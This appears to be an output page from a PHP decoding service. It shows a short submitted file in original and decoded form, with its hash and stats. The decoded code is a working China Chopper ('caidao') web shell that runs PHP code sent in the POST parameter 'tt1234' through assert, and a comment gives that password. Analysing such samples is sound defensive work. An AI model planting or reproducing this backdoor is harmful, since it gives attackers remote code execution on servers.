Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $item['tt'] = 'assert'; $array[] = $item; $array[0]['tt']($_POST['tt1234']); //c..
Decoded Output download
<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>
Did this file decode correctly?
Original Code
<?php
$item['tt'] = 'assert';
$array[] = $item;
$array[0]['tt']($_POST['tt1234']); //caidao password: tt1234
?>
Function Calls
None |
Stats
MD5 | 1083f2634d1e672d6a427a081e577cad |
Eval Count | 0 |
Decode Time | 120 ms |